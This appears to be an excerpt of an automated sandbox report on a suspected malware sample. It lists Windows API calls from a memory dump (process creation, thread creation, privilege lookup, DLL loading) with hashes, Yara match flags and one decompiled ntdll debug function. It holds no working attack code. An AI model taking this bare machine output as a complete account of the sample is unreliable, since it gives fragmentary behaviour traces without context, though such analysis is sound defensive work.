                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 418d67e843a6e20bcb8b61129cfa72bef4780f36b85954071ceb27b274388cd9
                                                                          • Instruction ID: 6da4f28ee51dfecb3d60f010f74f6e954b6275d5870eac05df03b05b21d7113b
                                                                          • Opcode Fuzzy Hash: 418d67e843a6e20bcb8b61129cfa72bef4780f36b85954071ceb27b274388cd9
                                                                          • Instruction Fuzzy Hash: FCE07D11E462142DD31251546C02EBF3B4897E2701F0004FFFD40D89C2D498041982F2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 705dd8df07d37f28985bb3b578f2561076a027043ccd4215f214074c70ecb61f
                                                                          • Instruction ID: 47962a35b1496f828657aac512d805a3f2d84d81aaba07c8a432479da790b69c
                                                                          • Opcode Fuzzy Hash: 705dd8df07d37f28985bb3b578f2561076a027043ccd4215f214074c70ecb61f
                                                                          • Instruction Fuzzy Hash: 8C112775E041496BCF10DBA4E842EEDB775AB54318F0441EAE90CE7283F936AE58CB45
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00418594
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction ID: ccd65e455a6766b961bfcedf9323f9111758d35f24f5cf189e0879c04bc11aef
                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction Fuzzy Hash: B5015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258FA0D97251DA30E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040CCD0,?,?), ref: 0041704C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 907bbf536192e76f2e01ca642cad2c15767a2f7a1b91c3a3f37b3dba141790fd
                                                                          • Instruction ID: 55a3383c7e87c3e304995f6b1a77f193f2df8272bdc8db4072c6e9c93498b7c1
                                                                          • Opcode Fuzzy Hash: 907bbf536192e76f2e01ca642cad2c15767a2f7a1b91c3a3f37b3dba141790fd
                                                                          • Instruction Fuzzy Hash: D0F0E57379034036D3302A699C43FE77B988F56B10F18005AF689AB2C2C599B98243A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040CCD0,?,?), ref: 0041704C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
                                                                          • Instruction ID: 88395ffaa21961f076f3fdf85811e9b2945d3629371e3b1e8a13738ee262a76c
                                                                          • Opcode Fuzzy Hash: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
                                                                          • Instruction Fuzzy Hash: 65E092733903143AE33065999C03FE7B79CCB81B25F54002AFB0DEB2C1D599F84142A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFA2,0040CFA2,?,00000000,?,?), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 61d741f13c762c0c3d9c4dd0b5dd31100347617369d8ed4e751554871afb2031
                                                                          • Instruction ID: b492ee65ba8bc85551817de21ab0afc2df0ea4206b9bc69b9402acfe1ba14197
                                                                          • Opcode Fuzzy Hash: 61d741f13c762c0c3d9c4dd0b5dd31100347617369d8ed4e751554871afb2031
                                                                          • Instruction Fuzzy Hash: CEF0A0B2600214ABCB20DF94DC80EE77768EF45390F214569FA1C97241DA3199558BE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00000000,?), ref: 004184BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFA2,0040CFA2,?,00000000,?,?), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00407C63,?), ref: 0040D43B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 277398dbf13f4179c9b7496eaa74525ad698b05b587a3650bbc836ed593caa28
                                                                          • Instruction ID: ced20648e43848aa154b271161ca3dc2f8a196833fde4e9e33a2169c003d577f
                                                                          • Opcode Fuzzy Hash: 277398dbf13f4179c9b7496eaa74525ad698b05b587a3650bbc836ed593caa28
                                                                          • Instruction Fuzzy Hash: 9AD05E76F503003EF610EEA49C06FA626895B64755F4A4079F94DE73C3DA28D9018568
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00407C63,?), ref: 0040D43B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction ID: 76295216a374bba8ccc5fc4b13cd7115f1d582a05cb993be163334a8e1d27b58
                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction Fuzzy Hash: B1D05E71B503043AE610AAA89C03F6632885B54B04F494064F949A63C3D964E5004565
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFA2,0040CFA2,?,00000000,?,?), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 9f8115ff1769d31a6f7f52e36d999440d1c0a573dd99967d02bf22a94f21daa9
                                                                          • Instruction ID: c1232d1a8e4e99d6700dad9e163c6271c5d2c8c15c6dedabe14bd1bef052e82d
                                                                          • Opcode Fuzzy Hash: 9f8115ff1769d31a6f7f52e36d999440d1c0a573dd99967d02bf22a94f21daa9
                                                                          • Instruction Fuzzy Hash: 15D0C9B5200518AF8B04EE4AD8908AB73A9AF882247258659FC0997301CA31ED268AB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4cf58cee9bb573d50f99746088a35b7b215f4f8374d7e9c2d498c0cc19a265ba
                                                                          • Instruction ID: bdbb17795a46d0cd9939e62a7e245f07e7aa3cdd5711e7ea8344e1e111d686dd
                                                                          • Opcode Fuzzy Hash: 4cf58cee9bb573d50f99746088a35b7b215f4f8374d7e9c2d498c0cc19a265ba
                                                                          • Instruction Fuzzy Hash: E0B02BF1A014C0C9F700DB600708717390077D0742F12C021D1020240A0338D094F5B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          C-Code - Quality: 53%
                                                                          			E0467FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                          				void* _t7;
                                                                          				intOrPtr _t9;
                                                                          				intOrPtr _t10;
                                                                          				intOrPtr* _t12;
                                                                          				intOrPtr* _t13;
                                                                          				intOrPtr _t14;
                                                                          				intOrPtr* _t15;
                                                                          
                                                                          				_t13 = __edx;
                                                                          				_push(_a4);
                                                                          				_t14 =  *[fs:0x18];
                                                                          				_t15 = _t12;
                                                                          				_t7 = E0462CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                          				_push(_t13);
                                                                          				E04675720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                          				_t9 =  *_t15;
                                                                          				if(_t9 == 0xffffffff) {
                                                                          					_t10 = 0;
                                                                          				} else {
                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                          				}
                                                                          				_push(_t10);
                                                                          				_push(_t15);
                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                          				return E04675720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                          			}


                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0467FDFA
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0467FE01
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0467FE2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 35c1f8f29e8fa21041fd530617396ec3fbb3ce64006d9ad73dd66e34ed774bc7
                                                                          • Instruction ID: 78a68e436549aca71619d2fa48da8703776d28076bc6875a26bd6ccbc6a358a8
                                                                          • Opcode Fuzzy Hash: 35c1f8f29e8fa21041fd530617396ec3fbb3ce64006d9ad73dd66e34ed774bc7
                                                                          • Instruction Fuzzy Hash: 2CF0F632200601BFE6245B55DC02F23BB6AEF44730F140358F628565E1FA62F860DAF9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%